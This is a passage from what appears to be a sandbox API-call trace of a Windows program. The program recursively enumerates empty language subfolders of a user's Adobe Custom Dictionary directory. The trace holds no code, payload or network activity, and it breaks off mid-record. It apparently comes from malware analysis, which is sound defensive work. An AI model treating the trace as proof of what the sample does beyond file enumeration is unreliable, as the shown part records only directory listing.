ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.451] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.451] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.451] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.451] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.451] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\") returned="brz\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.451] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.451] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.451] PathFindFileNameW (pszPath="") returned="" [0061.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.452] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.452] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.452] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.452] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.452] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\") returned="dan\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.453] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.453] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.453] PathFindFileNameW (pszPath="") returned="" [0061.453] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.453] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.453] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.453] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.454] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.454] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\") returned="dut\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.454] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.454] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.454] PathFindFileNameW (pszPath="") returned="" [0061.454] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.454] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.455] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.455] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.455] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.455] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\") returned="eng\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.455] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.455] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.455] PathFindFileNameW (pszPath="") returned="" [0061.455] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.456] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.456] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.456] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.456] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.456] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\") returned="frn\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.456] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.456] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.456] PathFindFileNameW (pszPath="") returned="" [0061.456] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.457] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.457] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.457] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.457] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.457] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\") returned="grm\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.457] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.457] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.457] PathFindFileNameW (pszPath="") returned="" [0061.457] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.458] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.458] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0061.458] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0061.458] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0061.458] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\") returned="itl\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0061.458] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0061.458] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0061.458] PathFindFileNameW (pszPath="") returned="" [0061.458] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0061.459] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, 